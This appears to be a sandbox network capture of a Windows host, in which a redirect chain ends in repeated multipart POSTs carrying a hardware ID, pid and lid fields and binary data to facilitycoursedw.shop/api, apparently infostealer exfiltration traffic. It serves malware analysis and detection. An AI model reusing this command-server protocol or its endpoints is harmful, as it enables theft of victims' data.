2024-06-23 22:10:36 UTC	665	OUT	GET /Website.php HTTP/1.1 Host: starjod.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-23 22:10:36 UTC	646	IN	HTTP/1.1 302 Found Server: hcdn Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close x-powered-by: PHP/8.1.27 location: https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer cache-control: no-cache, no-store, must-revalidate, max-age=0 platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 983611eb4271f97da9c7c63ce82359db-bos-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.191

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49790	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:39 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12839 Host: facilitycoursedw.shop
2024-06-23 22:10:39 UTC	12839	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
2024-06-23 22:10:39 UTC	802	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u3ibg4kbkhj5g19qpeo3puovnn; expires=Thu, 17-Oct-2024 15:57:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PLOCgs9t87cPmJ4zikP4mMgl62Sbm0xj2cerbfRuEiH6w%2FeclvuKtibughk6a16VJOoGdwSUhhanvX2Q5mxCkUULXW7gw9lbV4r48anDMGVN1Xt2yaEK7yyp06hAbN8WTPFMhRgW1Ew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf3389474322-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:39 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49791	142.250.186.164	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:39 UTC	880	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-23 22:10:39 UTC	705	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sun, 23 Jun 2024 20:23:10 GMT Expires: Mon, 01 Jul 2024 20:23:10 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 6449 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-23 22:10:39 UTC	685	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-06-23 22:10:39 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-06-23 22:10:39 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-06-23 22:10:39 UTC	1390	IN	Data Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-06-23 22:10:39 UTC	575	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49793	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:40 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15081 Host: facilitycoursedw.shop
2024-06-23 22:10:40 UTC	15081	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
2024-06-23 22:10:40 UTC	804	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1fn6crumufltntkd13lsd0ril; expires=Thu, 17-Oct-2024 15:57:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2By32IVlpt4Ybzc6JhXbddWuqQsrrXAkdgzBhtUXV46R%2BZQOZYVrfYNAZB6gk3jqjYvuDsDmnmM54rcq8gOeiI3f2aQnflMh8kOecYnXYHWM8TlpqM64ZcHSJ2BGlFsakPKXJsadRsg4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf391f48c420-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49798	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:41 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20571 Host: facilitycoursedw.shop
2024-06-23 22:10:41 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
2024-06-23 22:10:41 UTC	5240	OUT	Data Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
2024-06-23 22:10:42 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=21rrm13i1hhlkiu54r1ejd552f; expires=Thu, 17-Oct-2024 15:57:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUo2PkmfNHuTEwvFWJhHgJhrH5eL28WIStPSWXh89nso1F6jViSiVPgRAag9c%2BmR3rTTqc1mJ3MXIYQi2dhXh0HwiyqzhdLKQZBFTmFQo%2FRF%2BJMDAiKaog4c154N4uL8ZPmH7Bz9PnM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf3fb8cd6a58-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:42 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49802	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:42 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5454 Host: facilitycoursedw.shop
2024-06-23 22:10:42 UTC	5454	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
2024-06-23 22:10:42 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b7aa8nplhtoskrnug1i1n5ik16; expires=Thu, 17-Oct-2024 15:57:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BWnAkjeyxJZDn0Qz8CDJjks2kILxxK0He5EByPeUOwTawBsfe1AzQ5a3rMsJaUCJ5AFMHrGmVcXX6N0g%2B8OUnLL6j3AgBDHr2TgqdE3uCVQojJSCQ3R2E%2BMV5vIBsqjDZsyqwxT6x0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf485c73420a-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:42 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49805	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:43 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1314 Host: facilitycoursedw.shop
2024-06-23 22:10:43 UTC	1314	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
2024-06-23 22:10:43 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lhvrgh2n9uaitdifllorbiei9r; expires=Thu, 17-Oct-2024 15:57:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1b703%2FOENlZhp6lMkyfLciba3i%2Fp9At21gbys1ti2mc9rDbriSO5dSXdmQDgLpc7Tz%2Fd%2Fz7guGtUCjisttInxnMHsgGTdZFBNcZ8Kz6cCB4By1nhxYHDraECvLXl7XUxAeeIfZoIdk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf4e0bb58c36-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:43 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	52894	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:44 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 315821 Host: facilitycoursedw.shop
2024-06-23 22:10:44 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"fuOLMb--palpa
